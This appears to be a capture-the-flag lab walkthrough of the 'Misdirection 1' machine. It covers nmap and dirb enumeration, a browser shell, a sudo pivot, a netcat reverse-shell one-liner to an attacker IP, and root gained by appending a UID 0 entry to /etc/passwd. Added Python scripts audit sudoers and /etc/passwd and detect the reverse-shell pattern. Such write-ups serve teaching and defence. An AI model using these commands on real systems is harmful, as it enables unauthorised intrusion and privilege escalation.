Secuneus Labs – TryHackMe Walk-through : Misdirection 1
Penetration Testing Methodologies
Network Scan
- Netdiscover
- Nmap
Enumeration
- Directory Bruteforce
Exploit
Privilege Escalation
Walkthrough
Step 1 : Run the Netdiscover tool to list all the devices connected to the same network; from that list you can pick out the IP of the target. The IP found here is 192.168.29.211.
Command = sudo netdiscover -i eth0 -r 192.168.29.91/24
Step 2 : Run the Nmap tool in aggressive mode (-A) against the IP of the target to find the open ports and the services behind them.
Command = nmap -A 192.168.29.211
Step 3 : The nmap scan showed that port 80 (HTTP) and port 8080 (Apache) are open, so we will check both ports in the browser.
Port 80
Port 8080
Step 4 : Neither port showed anything useful in the browser, so we now use the dirb tool (dirb is a command-line tool for web application enumeration; it finds hidden directories and files on a web server by brute-forcing common directory and file names from a wordlist) against port 8080 (Apache) to discover hidden files.
Command = dirb http://192.168.29.211:8080
Step 5 : After scanning we found 3 interesting links that can help us further: http://192.168.29.211:8080/debug/, http://192.168.29.211:8080/shell/ and http://192.168.29.211:8080/wordpress/.
When we opened the wordpress link it took us to a hidden website that was not very useful.
The shell link opened a page with only a Parent Directory link, which took us back to the Apache default page, so it was not useful either.
The third link, the debug directory, took us to a browser-based shell that could help us further in gaining root access.
Step 6 : First we check which user this shell runs as. Here the user was www-data.
Command = whoami
Next, run the command sudo -l. When run by a user, it lists the commands that user is allowed to run with elevated privileges through sudo; it is the standard way to check what you may run as another user or as root.
Here it showed an entry for a user called brexit, who has read and write permissions just like a root user, and it showed that www-data can run a shell as brexit without a password.
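From the defender's side, the sudo -l result above is exactly what a sudoers audit should catch: a service account that may run a shell as another user with NOPASSWD. The following Python script is an added example and not part of the original walkthrough; the sudoers content it parses is constructed (the walkthrough only shows the sudo -l output as a screenshot, so the rule `www-data ALL=(brexit) NOPASSWD: /bin/bash` is an assumption of what such a rule looks like), and the SHELL_LIKE and SERVICE_ACCOUNTS lists are the example's own choices.

```python
import re

# Constructed sample of a sudoers file (an assumption: the walkthrough only shows
# the `sudo -l` output as a screenshot, so this is what a rule letting www-data
# run a shell as brexit without a password would look like).
SAMPLE_SUDOERS = """\
Defaults        env_reset
# default administrative rules
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
# web server account allowed to become another user without a password
www-data ALL=(brexit) NOPASSWD: /bin/bash
# a narrowly scoped rule, for contrast
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app
"""

# Programs that hand the run-as user a shell or arbitrary code execution.
SHELL_LIKE = {"/bin/bash", "/bin/sh", "/bin/dash", "/usr/bin/python3",
              "/usr/bin/perl", "/usr/bin/vim", "/usr/bin/less"}
# Accounts that should not normally appear in sudoers at all.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

# user  host=(runas[:group]) [TAG: ...] command[, command...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse the user-specification lines of a sudoers file into dicts."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                               # aliases etc. are ignored here
        runas = (m.group("runas") or "root").split(":")[0] or "root"
        tags = set(re.findall(r"([A-Z]+):", m.group("tags")))
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        rules.append({"user": m.group("user"), "runas": runas,
                      "nopasswd": "NOPASSWD" in tags, "cmds": cmds})
    return rules


def risky_rules(rules):
    """Return human-readable findings for rules that enable privilege escalation."""
    findings = []
    for r in rules:
        progs = {c.split()[0] for c in r["cmds"] if c != "ALL"}
        grants_shell = "ALL" in r["cmds"] or bool(progs & SHELL_LIKE)
        if r["nopasswd"] and grants_shell:
            findings.append(f"{r['user']} -> {r['runas']}: passwordless shell via "
                            f"{', '.join(r['cmds'])}")
        elif r["user"] in SERVICE_ACCOUNTS:
            findings.append(f"{r['user']} -> {r['runas']}: service account has sudo "
                            f"rights ({', '.join(r['cmds'])})")
    return findings


if __name__ == "__main__":
    for f in risky_rules(parse_sudoers(SAMPLE_SUDOERS)):
        print("RISK:", f)
```

The deploy rule is included on purpose: it is also NOPASSWD, but it grants one fixed systemctl command rather than an interpreter, so the audit stays quiet about it and only the www-data rule is reported.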
Step 7 : From this it is clear that we can use the reverse shell cheat sheet. A reverse shell is a shell connection initiated by the target machine back to a remote attacker's system; it gives the attacker command-line access to the target, with the ability to execute commands and interact with the target's shell.
Command [This command will be put in the target machine] = rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.29.91 4444 >/tmp/f
The above line is three commands separated by ; (the third is itself a pipeline); in it,
rm /tmp/f removes (deletes) any existing file named f in the /tmp directory, so that the next command can create it fresh.
mkfifo /tmp/f creates a named pipe called f in the /tmp directory. Named pipes are used for inter-process communication: different processes exchange data by writing to and reading from the pipe.
cat /tmp/f|/bin/sh -i 2>&1 reads whatever arrives in the pipe /tmp/f and feeds it as input to an interactive shell (/bin/sh -i). The 2>&1 redirects the shell's standard error into its standard output, so error messages travel along with the normal output.
|nc 192.168.29.91 4444 >/tmp/f uses a Unix pipeline (|) and the nc (netcat) command: the shell's output is sent over a network connection to the specified IP address and port (192.168.29.91:4444), and whatever comes back over that connection is written into the pipe /tmp/f, where cat picks it up and feeds it to the shell. This is what closes the loop and makes the shell interactive over the network.
Command [This command will be put in attacker’s machine] = nc -lnvp 4444
Running this tells netcat to listen on port 4444 for the incoming connection (-l listen, -n no DNS lookups, -v verbose, -p port).
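Seen from the defender's side, the pipeline explained above leaves a recognisable trail: a FIFO created in /tmp, an interactive sh -i, and a netcat process connecting out to an IP and port, all from the web server's account within a second or two. The following Python script is an added example and not part of the original walkthrough; it turns that explanation into detection logic. The process-event records and their field names (ts, user, cmdline) are constructed for the example, modelled on what an execve log would carry, and the walkthrough's own one-liner is used as the test input.

```python
import os
import re
import shlex
from collections import defaultdict

# Constructed process-execution events (an assumption: fields modelled on what an
# EDR or auditd execve record would carry; the cmdlines for www-data are the
# pieces of the walkthrough's one-liner as a shell would spawn them).
EVENTS = [
    {"ts": 100.0, "user": "www-data", "cmdline": "rm /tmp/f"},
    {"ts": 100.1, "user": "www-data", "cmdline": "mkfifo /tmp/f"},
    {"ts": 100.2, "user": "www-data", "cmdline": "cat /tmp/f"},
    {"ts": 100.2, "user": "www-data", "cmdline": "/bin/sh -i"},
    {"ts": 100.3, "user": "www-data", "cmdline": "nc 192.168.29.91 4444"},
    # benign activity by another account, far apart in time
    {"ts": 400.0, "user": "backup", "cmdline": "mkfifo /var/backups/pipe"},
    {"ts": 900.0, "user": "backup", "cmdline": "nc -z 10.0.0.5 22"},
]

TMP_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
IP_PORT = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\s+\d{1,5}\b")


def indicators(cmdline):
    """Map one command line to the reverse-shell building blocks it contains."""
    found = set()
    # the one-liner may arrive whole (sh -c '...') or as separate processes,
    # so split on ; | & and look at each simple command on its own
    for seg in re.split(r"[;|&]+", cmdline):
        try:
            argv = shlex.split(seg)
        except ValueError:                 # unbalanced quotes: fall back to whitespace
            argv = seg.split()
        if not argv:
            continue
        prog, args = os.path.basename(argv[0]), argv[1:]
        if prog in ("mkfifo", "mknod") and any(a.startswith(TMP_DIRS) for a in args):
            found.add("fifo_in_tmp")
        if prog in ("sh", "bash", "dash") and "-i" in args:
            found.add("interactive_shell")
        listening = any(a.startswith("-") and "l" in a[1:] for a in args)
        if prog in ("nc", "ncat", "netcat") and not listening and IP_PORT.search(seg):
            found.add("netcat_connect")
    return found


def detect(events, window=5.0):
    """Flag a user whose events within `window` seconds combine an outbound
    netcat with a FIFO in a temp directory or an interactive shell."""
    findings = []
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        i = 0
        while i < len(evs):
            seen, j = set(), i
            while j < len(evs) and evs[j]["ts"] - evs[i]["ts"] <= window:
                seen |= indicators(evs[j]["cmdline"])
                j += 1
            if "netcat_connect" in seen and seen & {"fifo_in_tmp", "interactive_shell"}:
                findings.append({"user": user, "start": evs[i]["ts"],
                                 "indicators": sorted(seen)})
                i = j                       # one alert per cluster of events
            else:
                i += 1
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print("ALERT:", f)
```

The backup account's events show why the time window matters: a mkfifo and a netcat port check five hundred seconds apart are unrelated and produce no alert, while the same two indicators a few hundred milliseconds apart from www-data do. A listener (nc -l...) is deliberately not counted as netcat_connect, since the listening end of the exchange runs on the attacker's machine, not the target.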
Step 8 : Next we get a shell as the user brexit.
Command = sudo -u brexit /bin/bash
This command launches a Bash shell running as the user brexit.
Step 9 : To get root access we need to make a new ID and password through which we can log in as the root user. First we generate the password hash:
Command = openssl passwd -1 -salt user3 pass123
The above command tells OpenSSL to hash the password pass123 with the MD5-crypt algorithm (-1) using the specific salt user3.
It outputs the hash string that we will use in the next step: $1$user3$rAGRVf5p2jYTqtqOW5cPu/
We can confirm the value with the echo command, which simply prints its argument to the terminal.
Command = echo '$1$user3$rAGRVf5p2jYTqtqOW5cPu/'
Output = $1$user3$rAGRVf5p2jYTqtqOW5cPu/
Step 10 : Since /etc/passwd can be modified by brexit, we append a new entry to it with the details a user record needs (username, encrypted password, user ID, group ID, home directory and default shell) to get root access.
Command = echo 'good:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash' >> /etc/passwd
This command appends a new user entry with those details to /etc/passwd; the password field holds the MD5-crypt hash generated above, and the single quotes stop the shell from treating the $ characters in the hash as variables.
The last step is to log in as the new user good with the password pass123; because the entry has user ID 0, that gives us root access, with which we can read the user flag and the root flag as well.
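Steps 9 and 10 together are the classic "writable /etc/passwd" escalation, and from the defender's side every part of it is visible in the file itself: a second UID 0 account, a hash sitting in /etc/passwd instead of /etc/shadow, and a legacy $1$ MD5-crypt prefix. The following Python script is an added example and not part of the original walkthrough; the /etc/passwd contents it audits are constructed, with the walkthrough's appended entry as the last line, and the passwd_file_writable helper only checks mode bits passed to it (an assumption: the walkthrough says brexit can modify the file but does not show which permission allowed it).

```python
import stat

# Constructed /etc/passwd contents (an assumption): the first four lines are
# ordinary entries, the last one is the entry the walkthrough appends.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
brexit:x:1000:1000:brexit,,,:/home/brexit:/bin/bash
good:$1$user3$rAGRVf5p2jYTqtqOW5cPu/:0:0::/root:/bin/bash
"""

# crypt(3) prefixes and what they mean to an auditor.
HASH_SCHEMES = {
    "$1$": "md5crypt (fast, legacy)",
    "$2": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$y$": "yescrypt",
}
SHADOWED = {"x", "*", "!", "!!"}   # "look in /etc/shadow" or "account locked"


def parse_passwd(text):
    """Split /etc/passwd lines into their seven colon-separated fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        try:
            if len(fields) != 7:
                raise ValueError("expected 7 fields")
            entries.append({"line": lineno, "name": fields[0], "pw": fields[1],
                            "uid": int(fields[2]), "gid": int(fields[3]),
                            "gecos": fields[4], "home": fields[5], "shell": fields[6]})
        except ValueError as exc:            # wrong field count or non-numeric uid/gid
            entries.append({"line": lineno, "error": str(exc)})
    return entries


def audit_passwd(entries):
    """Return findings for entries that grant root or bypass /etc/shadow."""
    findings = []
    owner_of_uid = {}
    for e in entries:
        if "error" in e:
            findings.append(f"line {e['line']}: malformed entry ({e['error']})")
            continue
        who = f"line {e['line']}: '{e['name']}'"
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"{who} has UID 0 (extra superuser account)")
        if e["pw"] == "":
            findings.append(f"{who} has an empty password field (no password needed)")
        elif e["pw"] not in SHADOWED:
            scheme = next((d for p, d in HASH_SCHEMES.items() if e["pw"].startswith(p)),
                          "unknown or DES")
            findings.append(f"{who} keeps a password hash in world-readable /etc/passwd ({scheme})")
        if e["uid"] in owner_of_uid:
            findings.append(f"{who} shares UID {e['uid']} with '{owner_of_uid[e['uid']]}'")
        else:
            owner_of_uid[e["uid"]] = e["name"]
    return findings


def passwd_file_writable(mode):
    """True when the mode bits let group or others write the file, the kind of
    permission slip that lets a non-root user such as brexit edit it."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    for f in audit_passwd(parse_passwd(PASSWD_SAMPLE)):
        print("FINDING:", f)
```

On a live host the same functions would be fed the real file (open("/etc/passwd").read()) and its mode from os.stat; the sample keeps the example offline. A clean system yields no findings, and the appended line alone produces three, one for each property an attacker needs from it.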
Created By – Devansh Thapar